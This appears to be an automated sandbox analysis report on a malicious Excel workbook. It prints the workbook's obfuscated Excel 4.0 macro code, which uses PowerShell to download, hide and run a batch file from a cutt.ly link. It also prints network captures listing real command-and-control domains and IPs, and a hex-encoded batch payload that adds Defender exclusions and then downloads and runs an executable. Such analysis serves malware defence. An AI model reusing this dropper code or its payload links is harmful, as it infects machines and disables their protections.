                                                        Document Summary

                                                        Document Code Page:1252
                                                        Thumbnail Scaling Desired:False
                                                        Contains Dirty Links:False
                                                        Shared Document:False
                                                        Changed Hyperlinks:False
                                                        Application Version:1048576

                                                        Streams

                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        File Type:data
                                                        Stream Size:276
                                                        Entropy:3.16930549839
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        File Type:data
                                                        Stream Size:156
                                                        Entropy:3.29938329109
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                                                        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 276911
                                                        General
                                                        Stream Path:Workbook
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Stream Size:276911
                                                        Entropy:7.85404453629
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                        Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                        Macro 4.0 Code

                                                        ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/ZjsbPXY','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp                           Source Port  Dest Port  Source IP      Dest IP
                                                        Jan 8, 2021 09:06:06.970048904 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:07.010096073 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:07.010205030 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:07.033577919 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:07.073527098 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:07.078279972 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:07.078305006 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:07.078320026 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:07.078397036 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:07.085994005 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:07.126003981 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:07.126857042 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:07.329070091 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:11.254014015 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:11.293910980 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:11.354618073 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:11.354665995 CET  443          49165      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:11.354723930 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:11.358566046 CET  49167        80         192.168.2.22   37.46.150.139
                                                        Jan 8, 2021 09:06:11.405617952 CET  80           49167      37.46.150.139  192.168.2.22
                                                        Jan 8, 2021 09:06:11.405689001 CET  49167        80         192.168.2.22   37.46.150.139
                                                        Jan 8, 2021 09:06:11.405921936 CET  49167        80         192.168.2.22   37.46.150.139
                                                        Jan 8, 2021 09:06:11.458991051 CET  80           49167      37.46.150.139  192.168.2.22
                                                        Jan 8, 2021 09:06:11.459027052 CET  80           49167      37.46.150.139  192.168.2.22
                                                        Jan 8, 2021 09:06:11.459093094 CET  49167        80         192.168.2.22   37.46.150.139
                                                        Jan 8, 2021 09:06:11.517374039 CET  49167        80         192.168.2.22   37.46.150.139
                                                        Jan 8, 2021 09:06:11.517652035 CET  49165        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:18.680576086 CET  49168        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:18.720607042 CET  443          49168      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:18.720712900 CET  49168        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:18.726763010 CET  49168        443        192.168.2.22   104.22.1.232
                                                        Jan 8, 2021 09:06:18.766719103 CET  443          49168      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:18.773158073 CET  443          49168      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:18.773205042 CET  443          49168      104.22.1.232   192.168.2.22
                                                        Jan 8, 2021 09:06:18.773220062 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773267984 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.785875082 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.825841904 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.826107979 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.030057907 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.143624067 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.183582067 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.304924011 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.304955006 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.305063009 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.494285107 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.652462006 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.652621984 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.652738094 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.810796976 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814476967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814513922 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814532995 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814549923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814613104 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815541029 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815577984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815602064 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815601110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815625906 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815650940 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815670967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815684080 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815701008 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815721989 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.972599983 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972642899 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972662926 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972685099 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972733974 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.972889900 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973469973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973501921 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973524094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973550081 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973556042 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973567963 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973591089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973613977 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973625898 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973632097 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973656893 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973673105 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973685026 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973690033 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973711967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973731041 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973735094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973752975 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973777056 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973835945 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.130754948 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130800009 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130827904 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130851984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130876064 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130898952 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131103039 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131129980 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131153107 CET8049169192.185.194.191192.168.2.22

UDP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Jan 8, 2021 09:06:06.904562950 CET  52197  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:06.952363014 CET  53  52197  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:07.894315004 CET  53099  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:07.952980995 CET  53  53099  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:07.957093954 CET  52838  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:08.004982948 CET  53  52838  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:18.620414019 CET  61200  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:18.668276072 CET  53  61200  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:19.309438944 CET  49548  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:19.493421078 CET  53  49548  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:24.867347002 CET  55627  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:24.923634052 CET  53  55627  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:24.946413994 CET  56009  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:25.002636909 CET  53  56009  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:51.222317934 CET  61865  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:51.282998085 CET  53  61865  8.8.8.8  192.168.2.22
Jan 8, 2021 09:06:51.323060036 CET  55171  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:06:51.382138014 CET  53  55171  8.8.8.8  192.168.2.22
Jan 8, 2021 09:07:17.531116009 CET  52496  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:07:17.591433048 CET  53  52496  8.8.8.8  192.168.2.22
Jan 8, 2021 09:07:17.611469030 CET  57564  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:07:17.659508944 CET  53  57564  8.8.8.8  192.168.2.22
Jan 8, 2021 09:07:43.751187086 CET  63009  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:07:43.810369015 CET  53  63009  8.8.8.8  192.168.2.22
Jan 8, 2021 09:07:43.828711987 CET  59319  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:07:43.890265942 CET  53  59319  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:09.986008883 CET  53070  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:10.042922974 CET  53  53070  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:10.055391073 CET  59770  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:10.112701893 CET  53  59770  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:11.010469913 CET  61523  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:11.058412075 CET  53  61523  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:11.073539972 CET  62791  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:11.121582031 CET  53  62791  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:11.778194904 CET  50667  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:11.847470999 CET  53  50667  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:11.870695114 CET  54129  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:11.934531927 CET  53  54129  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:26.348934889 CET  65329  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:26.409410000 CET  53  65329  8.8.8.8  192.168.2.22
Jan 8, 2021 09:08:26.413012981 CET  60718  53  192.168.2.22  8.8.8.8
Jan 8, 2021 09:08:26.469329119 CET  53  60718  8.8.8.8  192.168.2.22

DNS Queries

Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class
Jan 8, 2021 09:06:06.904562950 CET  192.168.2.22  8.8.8.8  0xd78f  Standard query (0)  cutt.ly  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:18.620414019 CET  192.168.2.22  8.8.8.8  0x1192  Standard query (0)  cutt.ly  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:19.309438944 CET  192.168.2.22  8.8.8.8  0x4317  Standard query (0)  chebo.discountmonumentcenter.com  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:24.867347002 CET  192.168.2.22  8.8.8.8  0xefb6  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:24.946413994 CET  192.168.2.22  8.8.8.8  0x3f32  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:51.222317934 CET  192.168.2.22  8.8.8.8  0xc52e  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:51.323060036 CET  192.168.2.22  8.8.8.8  0x8c7b  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:17.531116009 CET  192.168.2.22  8.8.8.8  0x5a45  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:17.611469030 CET  192.168.2.22  8.8.8.8  0xeacf  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:43.751187086 CET  192.168.2.22  8.8.8.8  0xaf2a  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:43.828711987 CET  192.168.2.22  8.8.8.8  0xa4a6  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:09.986008883 CET  192.168.2.22  8.8.8.8  0x78c7  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:10.055391073 CET  192.168.2.22  8.8.8.8  0x9788  Standard query (0)  telete.in  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.778194904 CET  192.168.2.22  8.8.8.8  0xc5e  Standard query (0)  trashbininspector.fun  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.870695114 CET  192.168.2.22  8.8.8.8  0x1e1f  Standard query (0)  trashbininspector.fun  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.348934889 CET  192.168.2.22  8.8.8.8  0xff23  Standard query (0)  trashbininspector.fun  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.413012981 CET  192.168.2.22  8.8.8.8  0x8f4f  Standard query (0)  trashbininspector.fun  A (IP address)  IN (0x0001)

DNS Answers

Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class
Jan 8, 2021 09:06:06.952363014 CET  8.8.8.8  192.168.2.22  0xd78f  No error (0)  cutt.ly  -  104.22.1.232  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:06.952363014 CET  8.8.8.8  192.168.2.22  0xd78f  No error (0)  cutt.ly  -  172.67.8.238  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:06.952363014 CET  8.8.8.8  192.168.2.22  0xd78f  No error (0)  cutt.ly  -  104.22.0.232  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:18.668276072 CET  8.8.8.8  192.168.2.22  0x1192  No error (0)  cutt.ly  -  104.22.1.232  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:18.668276072 CET  8.8.8.8  192.168.2.22  0x1192  No error (0)  cutt.ly  -  172.67.8.238  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:18.668276072 CET  8.8.8.8  192.168.2.22  0x1192  No error (0)  cutt.ly  -  104.22.0.232  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:19.493421078 CET  8.8.8.8  192.168.2.22  0x4317  No error (0)  chebo.discountmonumentcenter.com  -  192.185.194.191  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:24.923634052 CET  8.8.8.8  192.168.2.22  0xefb6  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:25.002636909 CET  8.8.8.8  192.168.2.22  0x3f32  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:51.282998085 CET  8.8.8.8  192.168.2.22  0xc52e  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:06:51.382138014 CET  8.8.8.8  192.168.2.22  0x8c7b  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:17.591433048 CET  8.8.8.8  192.168.2.22  0x5a45  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:17.659508944 CET  8.8.8.8  192.168.2.22  0xeacf  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:43.810369015 CET  8.8.8.8  192.168.2.22  0xaf2a  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:07:43.890265942 CET  8.8.8.8  192.168.2.22  0xa4a6  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:10.042922974 CET  8.8.8.8  192.168.2.22  0x78c7  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:10.112701893 CET  8.8.8.8  192.168.2.22  0x9788  No error (0)  telete.in  -  195.201.225.248  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.847470999 CET  8.8.8.8  192.168.2.22  0xc5e  No error (0)  trashbininspector.fun  -  104.18.58.219  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.847470999 CET  8.8.8.8  192.168.2.22  0xc5e  No error (0)  trashbininspector.fun  -  172.67.166.210  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.847470999 CET  8.8.8.8  192.168.2.22  0xc5e  No error (0)  trashbininspector.fun  -  104.18.59.219  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.934531927 CET  8.8.8.8  192.168.2.22  0x1e1f  No error (0)  trashbininspector.fun  -  104.18.58.219  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.934531927 CET  8.8.8.8  192.168.2.22  0x1e1f  No error (0)  trashbininspector.fun  -  172.67.166.210  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:11.934531927 CET  8.8.8.8  192.168.2.22  0x1e1f  No error (0)  trashbininspector.fun  -  104.18.59.219  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.409410000 CET  8.8.8.8  192.168.2.22  0xff23  No error (0)  trashbininspector.fun  -  104.18.58.219  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.409410000 CET  8.8.8.8  192.168.2.22  0xff23  No error (0)  trashbininspector.fun  -  172.67.166.210  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.409410000 CET  8.8.8.8  192.168.2.22  0xff23  No error (0)  trashbininspector.fun  -  104.18.59.219  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.469329119 CET  8.8.8.8  192.168.2.22  0x8f4f  No error (0)  trashbininspector.fun  -  104.18.58.219  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.469329119 CET  8.8.8.8  192.168.2.22  0x8f4f  No error (0)  trashbininspector.fun  -  172.67.166.210  A (IP address)  IN (0x0001)
Jan 8, 2021 09:08:26.469329119 CET  8.8.8.8  192.168.2.22  0x8f4f  No error (0)  trashbininspector.fun  -  104.18.59.219  A (IP address)  IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • 37.46.150.139
                                                        • chebo.discountmonumentcenter.com

HTTP Packets

Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
0  192.168.2.22  49167  37.46.150.139  80  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  kBytes transferred  Direction  Data
Jan 8, 2021 09:06:11.405921936 CET  72  OUT  GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1
Host: 37.46.150.139
Connection: Keep-Alive
Jan 8, 2021 09:06:11.458991051 CET  73  IN  HTTP/1.1 200 OK
                                                        Date: Fri, 08 Jan 2021 08:06:11 GMT
                                                        Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                                                        Last-Modified: Mon, 04 Jan 2021 21:26:11 GMT
                                                        ETag: "7d0-5b819bd338a68"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 2000
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-msdownload
                                                        Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 74 2e 6c 79 2f 30 6a 73 62 55 44 54 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 63 72 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 63 72 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 